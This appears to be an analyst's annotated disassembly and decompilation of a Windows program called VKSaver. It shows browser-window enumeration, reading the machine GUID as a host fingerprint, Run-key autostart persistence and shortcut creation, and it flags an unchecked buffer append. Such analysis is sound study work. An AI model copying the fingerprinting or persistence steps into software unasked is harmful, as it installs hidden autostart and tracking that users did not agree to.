0x403580 sub_403580 str 25 api 4 imm 17 Unknown
sub_403580() {
push ebp
mov ebp, esp
mov eax, 0x5048
call __alloca_probe()
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
mov ebx, ecx
lea eax, [ebp-0x500C]
push edi
push eax
lea edx, [ebp-0x1004]
lea ecx, [ebp-0x5004]
mov [ebp-0x5008], ebx
mov dword ptr [ebp-0x500C], 0x00
mov dword ptr [0x4B1040], 0x00
call sub_401740()
mov esi, eax
add esp, 0x04
mov [ebp-0x5010], esi
test esi, esi
jz .27
push 0x00
push sub_403320()
mov dword ptr [0x4A103C], 0x00
call [user32.EnumWindows]
xor ebx, ebx
cmp [0x4A103C], ebx
jle .10
jmp .2
.2:
lea eax, [ebp-0x5014]
push eax
push [ebx*4+0x4A1040]
call [user32.GetWindowThreadProcessId]
mov edx, [ebp-0x5014]
mov ecx, esi
lea eax, [ebp-0x5004]
xor esi, esi
.3:
cmp [eax], edx
jz .6
inc esi
add eax, 0x04
dec ecx
jnz .3
.4:
mov edx, [0x4B1040]
.5:
mov esi, [ebp-0x5010]
inc ebx
cmp ebx, [0x4A103C]
jl .2
jmp .11
.6:
test esi, esi
js .4
push 0xFFFFFFF0
push [ebx*4+0x4A1040]
call [user32.GetWindowLongW]
test eax, 0x10000000
jz .4
mov eax, [0x4B1040]
shl eax, 0x09
push 0xFF
add eax, 0x471038
push eax
push [ebx*4+0x4A1040]
call [user32.GetWindowTextW]
mov edx, [0x4B1040]
mov eax, edx
shl eax, 0x09
cmp word ptr [eax+0x471038], 0x00
lea edi, [eax+0x471038]
jz .9
cmp byte ptr [ebp+esi*1-0x1004], 0x10
jnz .8
add edi, 0xFFFFFFFE
jmp .7
.7:
mov ax, [edi+0x02]
add edi, 0x02
test ax, ax
jnz .7
mov ecx, 0x08
mov esi, " - Apple Safari"
rep movsd
.8:
inc edx
mov [0x4B1040], edx
.9:
cmp edx, 0xFF
jnl .11
jmp .5
.10:
mov edx, [0x4B1040]
.11:
test edx, edx
jnz .28
mov ebx, [ebp-0x500C]
test bl, 0x01
jz .13
xor ecx, ecx
jmp .12
.12:
movzx eax, word ptr [ecx+"Microsoft Internet Explorer"]
mov [ecx+0x471038], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .12
mov edx, 0x01
mov [0x4B1040], edx
.13:
test bl, 0x02
jz .15
mov eax, edx
mov ecx, "Mozilla Firefox"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
jmp .14
.14:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .14
inc edx
mov [0x4B1040], edx
.15:
test bl, 0x04
jz .17
mov eax, edx
mov ecx, "Opera browser"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.16:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .16
inc edx
mov [0x4B1040], edx
.17:
test bl, 0x08
jz .19
mov eax, edx
mov ecx, "Google Chrome"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.18:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .18
inc edx
mov [0x4B1040], edx
.19:
test bl, 0x10
jz .21
mov eax, edx
mov ecx, "Apple Safari"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.20:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .20
inc edx
mov [0x4B1040], edx
.21:
test bl, 0x20
jz .23
mov eax, edx
mov ecx, "Yandex browser"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.22:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .22
inc edx
mov [0x4B1040], edx
.23:
test bl, 0x40
jz .25
mov eax, edx
mov ecx, "Maxthon browser"
shl eax, 0x09
sub eax, ecx
lea esi, [eax+0x471038]
lea ecx, [ecx]
.24:
movzx eax, word ptr [ecx]
mov [esi+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .24
inc edx
mov [0x4B1040], edx
.25:
mov ebx, [ebp-0x5008]
.26:
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
/* Decompiler output for sub_403580 (the disassembly above is the same
 * function). What the visible code does: it fills a table of window-title
 * strings at 0x471038 -- entries are 0x200 bytes (256 wide chars) apart and
 * the entry count lives in the global at 0x4b1040 -- by walking every
 * top-level window, keeping those whose process id is in a list prepared by
 * sub_401740, and then pushes the table into a list-view control via
 * LVM_INSERTITEMW. If no window qualified it falls back to fixed browser
 * names selected by a bit mask. Register arguments are not rendered by the
 * decompiler: the disassembly shows sub_401740 being called with
 * ecx = &auStack_5008 and edx = &acStack_1008 in addition to the pushed
 * &auStack_5010, so those buffers are filled by that callee. Globals are
 * printed as [0x0x....] by the tool; that is output formatting, not code.
 * Anything said about the helpers that are not on this page (sub_401740,
 * sub_403320, sub_404410, sub_406beb) is inferred and marked as such. */
void sub_403580(void)
{
int16_t iVar1;
code *pcVar2;
int32_t iVar3;
uint32_t *puVar4;
uint32_t uVar5;
int16_t *piVar6;
int32_t iVar7;
int32_t iVar8;
undefined4 *puVar9;
undefined4 *puVar10;
/* uStack_504c / iStack_5048 / iStack_5038 are offsets +0, +4 and +0x14 of
 * one 0x34-byte structure that is memset and passed to LVM_INSERTITEMW
 * below; that matches the LVITEMW layout (mask, iItem, ..., pszText). The
 * decompiler split it into three locals. */
uint32_t uStack_504c;
int32_t iStack_5048;
int32_t iStack_5038;
/* Out-parameter for GetWindowThreadProcessId (the owning process id). */
uint32_t uStack_5018;
/* Entry count returned by sub_401740, re-read at the top of each window
 * iteration because iVar3 is reused as the inner loop counter. */
int32_t iStack_5014;
/* [0] is a bit mask consumed by the fallback section (bits 1,2,4,8,0x10,
 * 0x20,0x40 = IE, Firefox, Opera, Chrome, Safari, Yandex, Maxthon). Its
 * address is passed to sub_401740, which presumably sets it. */
uint32_t auStack_5010 [2];
/* Compared against the pid of every enumerated window; presumably a list
 * of process ids produced by sub_401740 (ecx argument per disassembly). */
uint32_t auStack_5008 [4096];
/* One byte per auStack_5008 entry (edx argument per disassembly); the value
 * 0x10 selects the " - Apple Safari" suffix, the same value as the Safari
 * bit in the fallback mask. */
char acStack_1008 [4068];
/* puStack_14..uStack_24 are outgoing-argument slots: the stores to them
 * below are the decompiler's rendering of push sequences, and constants such
 * as 0x4035ce are return addresses, not data. */
undefined4 uStack_24;
undefined4 uStack_20;
uint32_t *puStack_1c;
code *pcStack_18;
uint32_t *puStack_14;
/* Stack probe for the 0x5048-byte frame (eax = 0x5048 in the disassembly). */
__alloca_probe();
puStack_14 = auStack_5010;
auStack_5010[0] = 0;
/* Reset the title-table entry count. */
[0x0x4b1040] = 0;
pcStack_18 = 0x4035ce;
/* sub_401740(&auStack_5010) -- plus ecx/edx as noted above. Returns the
 * number of valid entries; zero skips the whole window scan. */
iVar3 = sub_401740();
iStack_5014 = iVar3;
if (iVar3 != 0) {
/* EnumWindows(sub_403320, 0). sub_403320 is not shown; the loop below reads
 * a count from 0x4a103c and HWNDs from the array at 0x4a1040, so the
 * callback presumably collects top-level window handles there. */
puStack_14 = 0x0;
pcStack_18 = sub_403320;
[0x0x4a103c] = 0;
puStack_1c = 0x4035f8;
(*user32.EnumWindows)();
iVar7 = 0;
if (0 < [0x0x4a103c]) {
/* Outer loop: one iteration per collected window (iVar7 = index). */
code_r0x00403610:
puStack_14 = &uStack_5018;
pcStack_18 = *(iVar7 * 4 + 0x4a1040);
puStack_1c = 0x403624;
/* GetWindowThreadProcessId(hwnd[iVar7], &uStack_5018) */
(*user32.GetWindowThreadProcessId)();
puVar4 = auStack_5008;
iVar8 = 0;
/* Inner loop (continued at code_r0x00403638): linear search of the pid
 * list for this window's pid; iVar8 is the matching index. */
code_r0x00403634:
if (*puVar4 != uStack_5018) goto code_r0x00403638;
/* Match found. The sign test is `test esi,esi / js` in the disassembly;
 * iVar8 only ever counts up from 0 here, so this branch is always taken. */
if (-1 < iVar8) {
/* GetWindowLongW(hwnd, GWL_STYLE) -- 0xfffffff0 is GWL_STYLE (-16). */
puStack_14 = 0xfffffff0;
pcStack_18 = *(iVar7 * 4 + 0x4a1040);
puStack_1c = 0x40366c;
uVar5 = (*user32.GetWindowLongW)();
/* Only visible windows (0x10000000 = WS_VISIBLE) are recorded. */
if ((uVar5 & 0x10000000) != 0) {
/* GetWindowTextW(hwnd, &table[count], 0xff): the destination is the next
 * free 0x200-byte slot, cchMax 255 so the title plus NUL fits the slot. */
puStack_14 = 0xff;
pcStack_18 = [0x0x4b1040] * 0x200 + 0x471038;
puStack_1c = *(iVar7 * 4 + 0x4a1040);
uStack_20 = 0x403693;
(*user32.GetWindowTextW)();
/* Skip windows with an empty title. */
if (*([0x0x4b1040] * 0x200 + 0x471038) != 0) {
/* Flag byte 0x10 for this pid: append " - Apple Safari" to the title. */
if (acStack_1008[iVar8] == '\x10') {
/* Scan from slot start to the terminating NUL (the disassembly is a
 * plain 16-bit scan: edi = slot - 2; do { ax = [edi+2]; edi += 2 }
 * while ax != 0); the pointer arithmetic here is decompiler-scaled. */
puVar10 = [0x0x4b1040] * 0x200 + 0x471036;
do {
piVar6 = puVar10 + 2;
puVar10 = puVar10 + 2;
} while (*piVar6 != 0);
/* rep movsd, 8 dwords = 32 bytes = " - Apple Safari" plus NUL (16 wide
 * chars), written over the NUL found above. NOTE(review): there is no
 * length check before this copy. A title longer than 240 characters
 * (GetWindowTextW allows up to 254) puts the NUL within 16 wide chars
 * of the slot end, so the 32-byte append runs into the next 0x200-byte
 * entry -- or, for the last slot, past the table. */
puVar9 = " - Apple Safari";
for (iVar3 = 8; iVar3 != 0; iVar3 = iVar3 + -1) {
*puVar10 = *puVar9;
puVar9 = puVar9 + 1;
puVar10 = puVar10 + 1;
}
}
/* Commit the entry. */
004b1040 = [0x0x4b1040] + 1;
}
/* Table capacity is 255 entries; stop scanning once it is full. */
if (0xfe < [0x0x4b1040]) goto code_r0x004036f2;
}
}
goto code_r0x00403645;
}
/* Window scan finished (or table full). Any recorded entry skips the
 * fallback and goes straight to the list-view update. */
code_r0x004036f2:
if ([0x0x4b1040] != 0) goto code_r0x00403886;
/* Fallback: no matching visible window, so seed the table with one fixed
 * name per set bit in auStack_5010[0]. Each block is a wide-char strcpy
 * into table slot [0x4b1040]; the strange index constants (0x2cbe, 0x2cae,
 * ...) are the decompiler folding (0x471038 - &string)/2 into the index --
 * the disassembly does `sub eax, ecx / lea esi, [eax+0x471038]` and writes
 * [esi+ecx], i.e. the same slot stride of 0x200 bytes. */
if ((auStack_5010[0] & 1) != 0) {
iVar3 = 0;
do {
piVar6 = iVar3 + "Microsoft Internet Explorer";
*(iVar3 + 0x471038) = *piVar6;
iVar3 = iVar3 + 2;
} while (*piVar6 != 0);
/* Bit 1 always lands in slot 0, so the count is set rather than incremented. */
[0x0x4b1040] = 1;
}
if ((auStack_5010[0] & 2) != 0) {
piVar6 = "Mozilla Firefox";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2cbe] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 4) != 0) {
piVar6 = "Opera browser";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2cae] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 8) != 0) {
piVar6 = "Google Chrome";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2ca0] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 0x10) != 0) {
piVar6 = "Apple Safari";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2c92] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 0x20) != 0) {
piVar6 = "Yandex browser";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2c84] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
if ((auStack_5010[0] & 0x40) != 0) {
piVar6 = "Maxthon browser";
do {
iVar1 = *piVar6;
piVar6[[0x0x4b1040] * 0x100 + 0x2c74] = iVar1;
piVar6 = piVar6 + 1;
} while (iVar1 != 0);
004b1040 = [0x0x4b1040] + 1;
}
}
/* Still nothing to show (sub_401740 returned 0 or no bits were set). The
 * global at 0x4b1044 is bumped and sub_404410 is called; sub_404410 is not
 * shown, but 0x4b1044 is read by sub_404dc0's WM_CREATE path above
 * (compared with 0xC8 and 0x64 to choose which buttons to create), so this
 * looks like a UI-state switch -- verify in sub_404410. */
if ([0x0x4b1040] == 0) {
[0x0x4b1044] = [0x0x4b1044] + 1;
puStack_14 = 0x40386d;
sub_404410();
/* Called before every return; together with the [0x46F000] xor ebp
 * load in the prologue this is consistent with the MSVC stack-cookie
 * check (__security_check_cookie). Inferred from the pattern only. */
sub_406beb();
return;
}
/* Push the table into the list-view, but only when the entry count
 * changed since the last refresh (cached in 0x4b2018). 0x4b1448 is used as
 * the SendMessageW target and receives list-view messages, so it is
 * presumably the SysListView32 handle. */
code_r0x00403886:
pcVar2 = user32.SendMessageW;
if ([0x0x4b1040] != [0x0x4b2018]) {
/* SendMessageW(hList, 0x1009 = LVM_DELETEALLITEMS, 0, 0) */
puStack_14 = 0x0;
pcStack_18 = 0x0;
puStack_1c = 0x1009;
uStack_20 = [0x0x4b1448];
uStack_24 = 0x4038af;
004b2018 = [0x0x4b1040];
(*user32.SendMessageW)();
iVar3 = 0;
if (0 < [0x0x4b1040]) {
/* iVar7 walks the title table, 0x200 bytes per entry. */
iVar7 = 0x471038;
do {
/* memset(&item, 0, 0x34) -- 0x34 is sizeof(LVITEMW) for the
 * pre-Vista layout, which fits the field offsets used below. */
puStack_14 = 0x34;
puStack_1c = &uStack_504c;
pcStack_18 = 0x0;
uStack_20 = 0x4038d0;
_memset();
/* SendMessageW(hList, 0x104d = LVM_INSERTITEMW, 0, &item) with
 * item.mask = 1 (LVIF_TEXT), item.iItem = iVar3, item.pszText = slot. */
puStack_14 = &uStack_504c;
pcStack_18 = 0x0;
puStack_1c = 0x104d;
uStack_20 = [0x0x4b1448];
uStack_504c = 1;
uStack_24 = 0x4038ff;
iStack_5048 = iVar3;
iStack_5038 = iVar7;
(*pcVar2)();
iVar3 = iVar3 + 1;
iVar7 = iVar7 + 0x200;
} while (iVar3 < [0x0x4b1040]);
}
}
/* Stack-cookie check (see note above) and normal return. */
sub_406beb();
return;
/* Inner-loop continuation: advance to the next pid-list entry; iVar3 is
 * the remaining entry count (re-loaded from iStack_5014 per window). */
code_r0x00403638:
iVar8 = iVar8 + 1;
puVar4 = puVar4 + 1;
iVar3 = iVar3 + -1;
if (iVar3 == 0) goto code_r0x00403645;
goto code_r0x00403634;
/* Outer-loop continuation: next window, or leave the scan when all
 * collected handles have been examined. */
code_r0x00403645:
iVar7 = iVar7 + 1;
iVar3 = iStack_5014;
if ([0x0x4a103c] <= iVar7) goto code_r0x004036f2;
goto code_r0x00403610;
}
0x402CE0 sub_402ce0 str 23 api 9 imm 28 Unknown
sub_402ce0() {
push ebp
mov ebp, esp
mov eax, 0x1514
call __alloca_probe()
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
push edi
lea eax, [ebp-0x1510]
push eax
push 0x101
push 0x00
push "SOFTWARE\\Microsoft\\Cryptography"
push 0x80000002
mov [ebp-0x150A], dl
mov [ebp-0x1509], cl
call [advapi32.RegOpenKeyExA]
test eax, eax
jnz .15
lea eax, [ebp-0x1514]
push eax
push 0x4B14CC
push 0x00
push 0x00
xorps xmm0, xmm0
push "MachineGuid"
push [ebp-0x1510]
mov dword ptr [ebp-0x1514], 0x28
movq [0x4B14CC], xmm0
movq [0x4B14D4], xmm0
movq [0x4B14DC], xmm0
movq [0x4B14E4], xmm0
movq [0x4B14EC], xmm0
call [advapi32.RegQueryValueExA]
push [ebp-0x1510]
mov edi, [advapi32.RegCloseKey]
call edi
mov esi, 0x4B14CC
xor ebx, ebx
.1:
cmp byte ptr [esi], 0x2D
jnz .2
inc esi
.2:
mov dl, [esi]
inc esi
xor al, al
lea ecx, [edx-0x30]
cmp cl, 0x09
jnbe .3
mov al, dl
sub al, 0x30
jmp .6
.3:
cmp dl, 0x61
jl .4
cmp dl, 0x66
jle .5
.4:
lea ecx, [edx-0x41]
cmp cl, 0x05
jnbe .6
.5:
mov al, dl
and al, 0x0F
add al, 0x09
.6:
mov ecx, ebx
test bl, 0x01
jz .7
shr ecx, 0x01
or [ecx+0x4B14BC], al
jmp .8
.7:
shl al, 0x04
shr ecx, 0x01
mov [ecx+0x4B14BC], al
.8:
inc ebx
cmp ebx, 0x20
jl .1
call sub_402360()
test al, al
jz .15
cmp byte ptr [0x4B14BA], 0x00
jz .9
call sub_4029b0()
.9:
call sub_401fa0()
test al, al
jz .15
lea eax, [ebp-0x1510]
push eax
push 0x03
push 0x00
push "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
push 0x80000002
call [advapi32.RegOpenKeyExW]
test eax, eax
jnz .11
mov ecx, 0x4B1A10
lea edx, [ecx+0x02]
lea esp, [esp]
.10:
mov ax, [ecx]
add ecx, 0x02
test ax, ax
jnz .10
sub ecx, edx
sar ecx, 0x01
lea eax, [ecx*2+0x02]
push eax
push 0x4B1A10
push 0x01
push 0x00
push "VKSaver"
push [ebp-0x1510]
call [advapi32.RegSetValueExW]
push [ebp-0x1510]
call edi
.11:
mov esi, [shell32.SHGetSpecialFolderPathW]
push 0x00
push 0x18
lea eax, [ebp-0x208]
push eax
push 0x00
call esi
push "\\VKSaver.lnk"
lea eax, [ebp-0x208]
push 0x100
push eax
call _wcscat_s()
mov edi, [kernel32.DeleteFileW]
add esp, 0x0C
lea eax, [ebp-0x208]
push eax
call edi
push 0x00
push 0x17
lea eax, [ebp-0x208]
push eax
push 0x00
call esi
push "\\VKSaver"
lea eax, [ebp-0x208]
push 0x100
push eax
call _wcscat_s()
add esp, 0x0C
lea eax, [ebp-0x208]
push 0x00
push eax
call [kernel32.CreateDirectoryW]
mov esi, [user32.wsprintfW]
push "VKSaver.lnk"
lea eax, [ebp-0x208]
push eax
lea eax, [ebp-0x408]
push "%s\\%s"
push eax
call esi
add esp, 0x10
lea eax, [ebp-0x408]
push eax
call edi
push "Launch VKSaver.lnk"
lea eax, [ebp-0x208]
push eax
lea eax, [ebp-0x408]
push "%s\\%s"
push eax
call esi
push 0xFFFFFF95
lea eax, [ebp-0x408]
push 0x46B100
push eax
mov edx, 0x46B4AC
mov ecx, 0x4B1A10
call sub_402b60()
add esp, 0x1C
lea eax, [ebp-0x208]
push "Readme.lnk"
push eax
lea eax, [ebp-0x408]
push "%s\\%s"
push eax
call esi
push 0xFFFFFF77
lea eax, [ebp-0x408]
push 0x46B100
push eax
mov edx, 0x46B4E8
mov ecx, 0x4B1610
call sub_402b60()
add esp, 0x1C
lea eax, [ebp-0x208]
push "Uninstall.lnk"
push eax
push "%s\\%s"
lea eax, [ebp-0x408]
push eax
call esi
push 0xFFFFFF78
lea eax, [ebp-0x408]
push "-uninstall"
push eax
mov edx, 0x46B540
mov ecx, 0x4B1A10
call sub_402b60()
add esp, 0x1C
lea eax, [ebp-0x508]
push 0x100
push eax
call [kernel32.GetSystemDirectoryA]
push "\\operaprefs_fixed.ini"
lea eax, [ebp-0x508]
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_402ce0 — host fingerprinting followed by install/persistence steps.
 * Analyst reading of the decompiled body (the listing is truncated after the
 * "Uninstall.lnk" step, so the tail of the routine is not visible here):
 *  1. reads HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid into the global
 *     buffer at 0x4b14cc and hex-decodes its 32 digits (dashes skipped) into a
 *     16-byte value at 0x4b14bc — a stable per-machine identifier;
 *  2. if sub_402360() and sub_401fa0() both return non-zero, writes a REG_SZ
 *     value "VKSaver" under HKLM\...\CurrentVersion\Run whose data is the wide
 *     string at 0x4b1a10 (Run-key persistence; compare the AutorunKey rule);
 *  3. removes an old shortcut from the common Startup folder (CSIDL 0x18),
 *     creates <CommonPrograms>\VKSaver (CSIDL 0x17) and regenerates three
 *     .lnk files there via sub_402b60 (most likely the IShellLinkW helper —
 *     the sample carries that GUID — TODO confirm).
 * The uStack_*/puStack_* assignments are the decompiler's rendering of pushed
 * arguments and return addresses; the asm listing above this function shows
 * the real call sequences.
 */
void sub_402ce0(void)
{
uint8_t *puVar1;
code *pcVar2;
code *pcVar3;
int16_t *piVar4;
uint8_t uVar5;
char cVar6;
uint8_t uVar7;
int32_t iVar8;
int16_t *piVar9;
char extraout_DL;
uint32_t uVar10;
uint8_t *puVar11;
undefined4 uStack_1518;
undefined4 uStack_1514;
char cStack_150e;
char acStack_150c [4096];
undefined auStack_50c [256];
undefined auStack_40c [512];
undefined auStack_20c [368];
undefined4 uStack_9c;
undefined4 uStack_98;
char *pcStack_94;
char *pcStack_90;
undefined *puStack_8c;
undefined4 uStack_88;
undefined *puStack_84;
undefined4 uStack_80;
char *pcStack_7c;
undefined *puStack_78;
undefined *puStack_74;
undefined *puStack_70;
undefined *puStack_6c;
undefined *puStack_68;
undefined *puStack_64;
undefined4 uStack_60;
undefined4 uStack_5c;
undefined *puStack_58;
undefined *puStack_54;
undefined4 uStack_50;
undefined *puStack_4c;
undefined4 uStack_48;
undefined *puStack_44;
undefined4 uStack_40;
int32_t iStack_3c;
undefined4 uStack_38;
undefined4 uStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
undefined4 *puStack_28;
undefined4 uStack_24;
undefined4 uStack_20;
undefined4 uStack_1c;
undefined4 uStack_18;
undefined4 *puStack_14;
__alloca_probe();
/* RegOpenKeyExA(HKLM, "SOFTWARE\\Microsoft\\Cryptography", 0,
 *               0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY, &uStack_1514) */
puStack_14 = &uStack_1514;
uStack_18 = 0x101;
uStack_1c = 0;
uStack_20 = "SOFTWARE\\Microsoft\\Cryptography";
uStack_24 = 0x80000002;
puStack_28 = 0x402d24;
cStack_150e = extraout_DL; /* decompiler artifact: DL is not a real input here */
iVar8 = (*advapi32.RegOpenKeyExA)();
if (iVar8 == 0) {
/* RegQueryValueExA(hKey, "MachineGuid", 0, 0, 0x4b14cc, &cb) with cb = 0x28 */
puStack_28 = &uStack_1518;
uStack_2c = 0x4b14cc;
uStack_30 = 0;
uStack_34 = 0;
uStack_38 = "MachineGuid";
iStack_3c = uStack_1514;
uStack_1518 = 0x28;
/* zero the 40-byte GUID text buffer (five 8-byte stores) before the query */
[0x0x4b14cc] = 0;
[0x0x4b14d4] = 0;
[0x0x4b14dc] = 0;
[0x0x4b14e4] = 0;
[0x0x4b14ec] = 0;
uStack_40 = 0x402d82;
(*advapi32.RegQueryValueExA)();
pcVar2 = advapi32.RegCloseKey; /* cached; reused through (*pcVar2)() below */
uStack_40 = uStack_1514;
puStack_44 = 0x402d90;
(*advapi32.RegCloseKey)();
/* Hex-decode the GUID text: 32 nibbles -> 16 bytes at 0x4b14bc.
 * '-' separators are skipped; '0'-'9', 'a'-'f' ('`' < c < 'g') and
 * 'A'-'F' (c + 0xbf < 6) are accepted; any other byte decodes as 0.
 * Even iterations set the high nibble, odd ones OR in the low nibble. */
puVar11 = 0x4b14cc;
uVar10 = 0;
do {
if (*puVar11 == 0x2d) {
puVar11 = puVar11 + 1;
}
uVar7 = *puVar11;
puVar11 = puVar11 + 1;
uVar5 = 0;
if (uVar7 - 0x30 < 10) {
uVar5 = uVar7 - 0x30;
}
else if ((('`' < uVar7) && (uVar7 < 'g')) || (uVar7 + 0xbf < 6)) {
uVar5 = (uVar7 & 0xf) + 9;
}
if ((uVar10 & 1) == 0) {
*((uVar10 >> 1) + 0x4b14bc) = uVar5 << 4;
}
else {
puVar1 = (uVar10 >> 1) + 0x4b14bc;
*puVar1 = *puVar1 | uVar5;
}
uVar10 = uVar10 + 1;
} while (uVar10 < 0x20);
/* sub_402360: first gate before installing; its contract is not visible here */
puStack_44 = 0x402def;
cVar6 = sub_402360();
if (cVar6 != '\0') {
/* 0x4b14ba is a byte flag set elsewhere from the command line; when set,
 * sub_4029b0 (listed later on this page) removes the previous install's
 * registry keys and directories first. */
if ([0x0x4b14ba] != '\0') {
puStack_28 = 0x402e05;
sub_4029b0();
}
/* sub_401fa0: second gate; contract not visible here */
puStack_28 = 0x402e0a;
cVar6 = sub_401fa0();
if (cVar6 != '\0') {
/* RegOpenKeyExW(HKLM, "Software\\...\\CurrentVersion\\Run", 0,
 *               3 = KEY_QUERY_VALUE | KEY_SET_VALUE, &uStack_1514) */
puStack_28 = &uStack_1514;
uStack_2c = 3;
uStack_30 = 0;
uStack_34 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
uStack_38 = 0x80000002;
iStack_3c = 0x402e2d;
iVar8 = (*advapi32.RegOpenKeyExW)();
if (iVar8 == 0) {
/* inline wcslen over the wide string at 0x4b1a10 (the installed exe path,
 * judging by its reuse in the .lnk and Uninstall-key code) */
piVar4 = 0x4b1a10;
do {
piVar9 = piVar4;
piVar4 = piVar9 + 1;
} while (*piVar9 != 0);
/* cbData = (wcslen + 1) * 2; the "-0x258d08" is a pointer-difference artifact */
iStack_3c = (piVar9 + -0x258d08 >> 1) * 2 + 2;
/* RegSetValueExW(hKey, "VKSaver", 0, REG_SZ (1), 0x4b1a10, cbData) */
uStack_40 = 0x4b1a10;
puStack_44 = 0x1;
uStack_48 = 0;
puStack_4c = "VKSaver";
uStack_50 = uStack_1514;
puStack_54 = 0x402e71;
(*advapi32.RegSetValueExW)();
puStack_54 = uStack_1514;
puStack_58 = 0x402e79;
(*pcVar2)(); /* RegCloseKey(hKey) */
}
/* SHGetSpecialFolderPathW(0, auStack_20c, 0x18 = CSIDL_COMMON_STARTUP, 0) */
pcVar3 = shell32.SHGetSpecialFolderPathW;
iStack_3c = 0;
uStack_40 = 0x18;
puStack_44 = auStack_20c;
uStack_48 = 0;
puStack_4c = 0x402e8e;
(*shell32.SHGetSpecialFolderPathW)();
/* wcscat_s(auStack_20c, 0x100, "\\VKSaver.lnk"); DeleteFileW(auStack_20c) —
 * removes a legacy startup-folder shortcut */
puStack_4c = "\\VKSaver.lnk";
puStack_54 = auStack_20c;
uStack_50 = 0x100;
puStack_58 = 0x402ea4;
_wcscat_s();
pcVar2 = kernel32.DeleteFileW; /* pcVar2 now means DeleteFileW, not RegCloseKey */
puStack_4c = auStack_20c;
uStack_50 = 0x402eb6;
(*kernel32.DeleteFileW)();
/* SHGetSpecialFolderPathW(0, auStack_20c, 0x17 = CSIDL_COMMON_PROGRAMS, 0) */
uStack_50 = 0;
puStack_54 = 0x17;
puStack_58 = auStack_20c;
uStack_5c = 0;
uStack_60 = 0x402ec5;
(*pcVar3)();
/* wcscat_s(auStack_20c, 0x100, "\\VKSaver"); CreateDirectoryW(auStack_20c, 0) */
uStack_60 = "\\VKSaver";
puStack_68 = auStack_20c;
puStack_64 = 0x100;
puStack_6c = 0x402edb;
_wcscat_s();
puStack_64 = auStack_20c;
uStack_60 = 0;
puStack_68 = 0x402eed;
(*kernel32.CreateDirectoryW)();
/* wsprintfW(auStack_40c, "%s\\%s", auStack_20c, "VKSaver.lnk"); DeleteFileW(auStack_40c) */
pcVar3 = user32.wsprintfW;
puStack_68 = "VKSaver.lnk";
puStack_6c = auStack_20c;
puStack_74 = auStack_40c;
puStack_70 = "%s\\%s";
puStack_78 = 0x402f0d;
(*user32.wsprintfW)();
puStack_68 = auStack_40c;
puStack_6c = 0x402f19;
(*pcVar2)(); /* DeleteFileW */
/* Build "<dir>\\Launch VKSaver.lnk" and hand it to sub_402b60 together with
 * 0x46b100 and icon index 0xffffff95 (-107); the asm shows ecx = 0x4b1a10
 * (target path) and edx = 0x46b4ac for this call. */
puStack_6c = "Launch VKSaver.lnk";
puStack_70 = auStack_20c;
puStack_78 = auStack_40c;
puStack_74 = "%s\\%s";
pcStack_7c = 0x402f33;
(*pcVar3)();
pcStack_7c = 0xffffff95;
puStack_84 = auStack_40c;
uStack_80 = 0x46b100;
uStack_88 = 0x402f50;
sub_402b60();
/* "<dir>\\Readme.lnk", icon index 0xffffff77 (-137); asm: ecx = 0x4b1610, edx = 0x46b4e8 */
puStack_70 = auStack_20c;
puStack_6c = "Readme.lnk";
puStack_78 = auStack_40c;
puStack_74 = "%s\\%s";
pcStack_7c = 0x402f6d;
(*pcVar3)();
pcStack_7c = 0xffffff77;
puStack_84 = auStack_40c;
uStack_80 = 0x46b100;
uStack_88 = 0x402f8d;
sub_402b60();
/* "<dir>\\Uninstall.lnk" with "-uninstall" as the shortcut argument,
 * icon index 0xffffff78 (-136); asm: ecx = 0x4b1a10, edx = 0x46b540 */
puStack_70 = auStack_20c;
puStack_6c = "Uninstall.lnk";
puStack_74 = "%s\\%s";
puStack_78 = auStack_40c;
pcStack_7c = 0x402faa;
(*pcVar3)();
pcStack_7c = 0xffffff78;
puStack_84 = auStack_40c;
uStack_80 = "-uninstall";
/* listing truncated */
0x4064E0 sub_4064e0 str 13 api 38 imm 29 Unknown
